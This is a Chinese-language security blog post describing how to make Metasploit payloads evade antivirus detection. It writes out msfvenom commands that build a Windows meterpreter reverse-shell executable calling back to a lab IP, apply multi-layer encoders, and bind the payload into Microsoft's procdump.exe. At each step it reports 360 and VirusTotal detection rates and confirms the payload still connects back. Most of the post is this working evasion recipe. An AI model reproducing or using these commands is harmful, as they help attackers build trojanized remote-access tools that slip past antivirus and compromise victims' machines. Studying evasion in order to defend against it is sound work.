Metasploit免杀初探索

2020-11-05 13,766


0x01 环境搭建

测试系统:windows10 (1909)

杀毒软件:360安全卫士

在线杀毒:VT


0x02 payload生成

msfVENOM -p windows/meterpreter/reverse_tcp LHOST=192.168.56.129 LPORT=7777 -f exe -o t.exe

201027vmg5wcvm1qdqbmd1.png.thumb.png

原始生成后,完全被查杀

201118c6jrh781ij8l91si.png.thumb.png

VT查杀55/69

201133tn8vzcvunm7cszkl.png.thumb.png

0x03 编码处理

这里使用msf自带的编码器进行测试

msfvenom --list encoders 查看当前所有编码器

201209u2l7srjjtr2z7cej.png.thumb.png

这里根据级别(Rank)选择最好的(excellent)进行尝试:x86/shikata_ga_nai

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.129 LPORT=7777 -e x86/shikata_ga_nai -b "\x00" -i 20  -f exe -o t2.exe

其中-b 特征码绕过 -i 编码次数

201228gqjq1cnmm10m0j0v.png.thumb.png

201240p72zh7jcrh7721c1.png.thumb.png

依旧被查杀

0x04 编码捆绑

测试编码并绑定微软官方工具,这里使用官方procdump做实验

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.129 LPORT=7777 -e x86/shikata_ga_nai -x procdump.exe  -i 20 -f exe -o t3.exe

201252hc399kp33z37i9z9.png.thumb.png

360并未报毒,vt查杀率36/68

201301v0jjjjlf0214j6kj.png.thumb.png

0x05多重编码

通过资料了解,msfvenom某一种编码器可以做到一定程度的免杀,这是可以多重编码增大免杀率,同时x86/shikata_ga_nai为多态编码,可以尝试增大编码次数达到免杀效果

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/call4_dword_xor -i 100 LHOST=192.168.56.129 LPORT=7777 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 100 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -b "&" -i 100 -f raw | msfvenom -a x86 --platform windows -e cmd/powershell_base64 -i 100 -x procdump.exe -k -f exe >t4.exe

这里测试编码次数100,同样绑定官方工具,360查杀并未报毒

201325tjifftg1a6a71ifj.png.thumb.png

VT在线查杀率34/68

201336ppz0idde7vk1dcde.png.thumb.png

测试可正常上线


本文作者:安全狗

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/145186.html

Tags:
评论  (2)
快来写下你的想法吧!

安全狗

文章数:32 积分: 180

基于智能驱动的新一代云安全公司

安全问答社区

安全问答社区

脉搏官方公众号

脉搏公众号